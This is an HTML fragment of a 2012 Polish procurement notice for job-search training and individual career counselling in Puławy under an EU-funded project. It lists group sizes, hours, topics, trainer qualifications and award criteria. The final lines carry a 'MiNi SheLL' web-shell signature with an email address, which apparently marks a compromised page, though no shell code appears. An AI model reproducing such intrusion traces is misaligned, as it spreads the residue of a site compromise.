3 grupy po 14 osób i 2 grupy po 13 osób (zamawiający zastrzega możliwość zmniejszenia liczby uczestników maksymalnie o 5% czyli o 3 osoby)
Czas trwania szkolenia
80  godzin dydaktycznych czyli 16 godzin dydaktycznych na grupę (jedna godzina dydaktyczna = 45 minut) + 2 przerwy kawowe i jedna przerwa na obiad.
Warunki organizacji czasu trwania zajęć
Zajęcia mogą być prowadzone w dni od poniedziałku do piątku z wyjątkiem dni świątecznych.
Zajęcia mogą się rozpoczynać najwcześniej o godzinie 8:00, natomiast muszą się zakończyć najpóźniej o godzinie 16:00
Termin realizacji szkolenia
Rozpoczęcie najwcześniej 07.05.2012roku, zakończenie najpóźniej do 31.05.2012roku.
Miejsce realizacji szkolenia
na terenie miasta Puławy
Wymagany minimalny zakres tematyczny szkolenia
( minimalny program szkolenia)
nabycie umiejętności poruszania się po rynku pracy
metody skutecznego poszukiwania pracy
autoprezentacja
przygotowanie do rozmowy kwalifikacyjnej
dokumenty aplikacyjne
zawody przyszłości
Wymagane minimalne kwalifikacje kadry dydaktycznej, która będzie przeprowadzała szkolenie będące przedmiotem zamówienia
Minimum dwie osoby co najmniej z wykształceniem wyższym kierunkowym w zakresie doradztwa zawodowego lub wykształceniem wyższym i studiami podyplomowymi w zakresie doradztwa zawodowego oraz z doświadczeniem w przeprowadzeniu minimum 3 szkoleń, warsztatów z zakresu aktywnego poszukiwania pracy.
Sposób sprawdzania efektów szkolenia.
Na początku i na koniec szkolenia zostaną przeprowadzone badania ewaluacyjne w zakresie nabytych umiejętności poruszania się po rynku pracy.
W cenę powinno być wliczone:
ubezpieczenie uczestników na okres trwania szkolenia od następstw NW.
kadra, która posiada odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia.
materiały szkoleniowe z naniesionymi odpowiednio obowiązującymi logotypami dla każdego uczestnika i  jednym egzemplarzem dla Zamawiającego: 
-	podręcznik Rozmowa kwalifikacyjna. O czym nie wiedzą kandydaci do pracy, czyli sekrety rekrutujących A. Śniegocka lub inna o tej samej tematyce.
-	podręcznik Jak pisać CV i list motywacyjny S. Sądowska lub inna o tej samej tematyce.
-	skrypt
-	notatnik, 
-	długopis, 
codzienny serwis kawowy( kawa, herbata, cukier, śmietanka, zimne napoje, ciastka) oraz jeden gorący posiłek (co najmniej drugie danie) każdego dnia szkolenia, dla wszystkich uczestników.
zaświadczenia o ukończeniu szkolenia, zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03.02.2006r. w sprawie uzyskania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formie pozaszkolnej( Dz.U. z 2006r. Nr 31 poz.216), oznaczone logotypem Programu Operacyjnego Kapitał Ludzki i Unii Europejskiej oraz sformułowaniem Projekt Aktywni - niezależni współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (wzór logotypu dostępny u zamawiającego).
prowadzenie dokumentacji szkolenia ( m.in., listy obecności, listy odbioru materiałów szkoleniowych, dziennika zajęć, ankiety ewaluacyjne itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy w prowadzeniu tego typu szkoleń, doradztwa, warsztatów (w ciągu ostatnich trzech lat) - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Indywidualne doradztwo zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowana ilość osób kierowanych na doradztwo:
90 osób 
(zamawiający zastrzega możliwość zmniejszenia lub zwiększenia liczby uczestników maksymalnie 
o 5% czyli o 3 osoby)
Czas trwania doradztwa
360 godzin dydaktycznych (jedna godzina dydaktyczna = 45 minut)
4 godziny dydaktyczne na jedną osobę
Warunki organizacji czasu trwania doradztwa
Zajęcia mogą być prowadzone w dni od poniedziałku do piątku z wyjątkiem dni świątecznych i 02.05.2011roku, 04.05.2012 roku oraz 08.06.2012 roku .
Zajęcia mogą się rozpoczynać najwcześniej o godzinie 8:00, natomiast muszą się zakończyć najpóźniej o godzinie 16:00
Termin realizacji doradztwa
Rozpoczęcie najwcześniej 16.04.2012roku, zakończenie najpóźniej do 29.06.2012roku ( z wyłączeniem 02.05.2012r., 04.05.2012 r., 08.06.2012  roku)
Miejsce realizacji doradztwa
  Dla 20 osób w Sali Miejskiego Ośrodka Pomocy Społecznej  przy ul. Wólka Profecka, dla
70 osób na terenie miasta Puławy
Wymagany minimalny zakres tematyczny doradztwa
( minimalny program szkolenia)
określenie predyspozycji zawodowych
rozpoznanie istniejących trudności w znalezieniu pracy
wyznaczenie ścieżki zawodowej, wybór kierunku kształcenia
sporządzenie CV i listu motywacyjnego ( w zależności od indywidualnych potrzeb klienta)
Wymagane minimalne kwalifikacje kadry dydaktycznej, która będzie przeprowadzała doradztwo będące przedmiotem zamówienia
Minimum dwie osoby co najmniej z wykształceniem wyższym kierunkowym w zakresie doradztwa zawodowego lub wykształceniem wyższym i studiami podyplomowymi w zakresie doradztwa zawodowego oraz każda z osobna posiadająca doświadczenie w przeprowadzeniu minimum 100 godzin dydaktycznych indywidualnego doradztwa zawodowego.
Rodzaj dokumentów przekazanych beneficjentowi, które zostaną sporządzone w trakcie indywidualnego doradztwa zawodowego.
Indywidualny plan działania (oznaczony obowiązującymi logotypami i zawierający nazwę projektu)
W cenę powinno być wliczone:
Ubezpieczenie uczestników na okres trwania szkolenia od następstw NW.
Kadra, która posiada odpowiednie kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia.
Materiały szkoleniowe z naniesionymi odpowiednio logotypami: 
-	teczka
-	notatnik, 
-	długopis, 
prowadzenie dokumentacji szkolenia ( m.in., listy obecności, listy odbioru materiałów szkoleniowych, dziennika zajęć itp.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 85.31.23.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 16.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie wykonawcy w prowadzeniu tego typu szkoleń, doradztwa, warsztatów (w ciągu ostatnich trzech lat) - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com